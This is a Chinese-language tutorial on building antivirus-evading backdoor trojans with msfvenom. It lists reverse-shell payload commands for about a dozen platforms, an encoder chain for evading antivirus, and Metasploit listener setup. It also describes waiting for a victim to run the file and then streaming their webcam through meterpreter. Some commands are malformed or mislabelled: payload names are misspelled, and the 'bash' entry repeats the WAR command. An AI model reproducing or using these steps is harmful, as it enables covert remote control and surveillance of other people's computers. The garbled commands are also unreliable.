msf免杀木马生成
免杀技术全称为反杀毒技术AntiAnti-Virus简称"免杀",它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广,其中包含反汇编、逆向工程、系统漏洞等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。
本章是通过msf(msfvenom)命令实现免杀的操作
msf常用命令
-p: 指定payload模块-l :列出可用项-f :指定文件类型-e: 加载编码器-b:删除无效字符-i :指定编码次数-x: 捆绑文件-o:导出文件在kali中生成常见的木马命令
msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i5lhost=xxx.xxx.xxx.xxxlport=xxxx -fexe>shell.exe
开启监听模块
msfconsole
useexploit/multi/handler
setpayloadwindows/meterpreter/reverse_tcp#设置攻击位
补充:常见的后门生成方式!!!!!
linux
msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=LPORT=-felf>shell.elf
windows
msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.exe
mac
msfvenom-posx/x86/shell_reverse_tcpLHOST=LPORT=-fmacho>shell.macho
android
msfvenom-pandroid/meterpreter/reverse_tcpLHOST=LPORT=R>shell.apk
php
msfvenom-pphp/meterpreter_reverse_tcpLHOST=LPORT=-fraw>shell.php
asp
msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-faspx>shell.asp
aspx
msfvenom-pwindows/meterpreter/reverse_tcpLHOST=LPORT=-faspx>shell.aspx
jsp
msfvenom-pjava/jsp_shell_reverse_tcpLHOST=LPORT=-fraw>shell.jsp
war
msfvenom-pjava/jsp_shell_reverse_tcpLHOST=LPORT=-fwar>shell.war
bash
msfvenom-pjava/jsp_shell_reverse_tcpLHOST=LPORT=-fwar>shell.war
perl
msfvenom-pcmd/unix/reverse_perlLHOST=LPORT=-fraw>shell.pl
python
msfvenom-ppython/meterpreter/reverser_tcpLHOST=LPORT=-fraw>shell.py
msfvenom的使用
建立后门及应用
msfvenom-pwindows/x64/meterpreter_revers_tcp(攻击的是windows系统(可以理解为攻击载荷),下方配置msf模块要与该处一致)
lhost=192.168.234.128(kali的IP地址)
lport=9999(端口,随意,只要不被占用即可(注意!!!下方配置msf模块要与该处一致))
-fexe-odemo9999.exe(生成的是exe文件)
(1.)生成病毒(放到本机会被杀毒软件删除)
(2.)进入msfconsole
若有疑问请看http://t.csdn.cn/i5rWX
1.使用模块
useexploit/multi/handler
查看配置是否完善使用命令showoptions
说明:
Payloadoptions这一大栏代表攻击载荷的设置,如图所示此时攻击载荷是generic/shell_reverse_tcp,因为与我们要攻击的不一致,说明该攻击载荷是错误的,需要修改成我们攻击的(生成木马也就是后门的时候用的是什么改成什么即可)
2.配置模块
设置Payload(更改为正确的攻击载荷)
配置LHOST(kali的ip地址)、LPORT(kali的端口)
3.运行模块
run
接下来就是等待有人点击刚开生成的后门程序了
自我测试:
1.将生成的后门程序复制到本地文件夹去,这时杀毒软件会提醒将其杀掉,在查毒软件的隔离区中,找到生成的后门程序,提取到本地文件夹中
2.双击运行该后门程序,在kali中便会先显示有鱼儿上钩了,跳转到meterpreter拿到权限
3.help查看权限,列出可以做的指令
4.比如下方打开摄像头
(1)首先看是否有摄像头输入命令webcam_list
(2)以打开视频为例子输入命令webcam_stream
会有弹出火狐浏览器,该黑屏就是摄像头的视频画面
退出按CTRL+c
(记得玩完在本地的运行管理器中结束该后门程序的任务)